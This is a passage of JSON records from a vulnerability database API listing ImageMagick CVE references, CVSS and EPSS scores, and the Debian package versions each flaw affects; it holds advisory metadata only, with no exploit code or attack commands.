"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1453", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1453" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "http://www.securityfocus.com/bid/106848", "reference_id": "", "reference_type": "", "scores": [], "url": "http://www.securityfocus.com/bid/106848" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672560", "reference_id": "1672560", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672560" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7398", "reference_id": "CVE-2019-7398", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:N/C:N/I:N/A:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7398" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-7398" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-twq8-ntkg-zbfk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81917?format=api", "vulnerability_id": "VCID-u6vb-tewy-fkda", "summary": "ImageMagick: memory leaks in ResizeMagickMemory function in ImageMagick/MagickCore/memory.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27755.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27755.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27755", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17725", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17885", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17938", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17639", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17727", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17788", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.178", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17755", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17707", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17654", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17662", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17701", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00057", "scoring_system": "epss", "scoring_elements": "0.17611", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27755" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27755", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27755" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894232", "reference_id": "1894232", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894232" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": 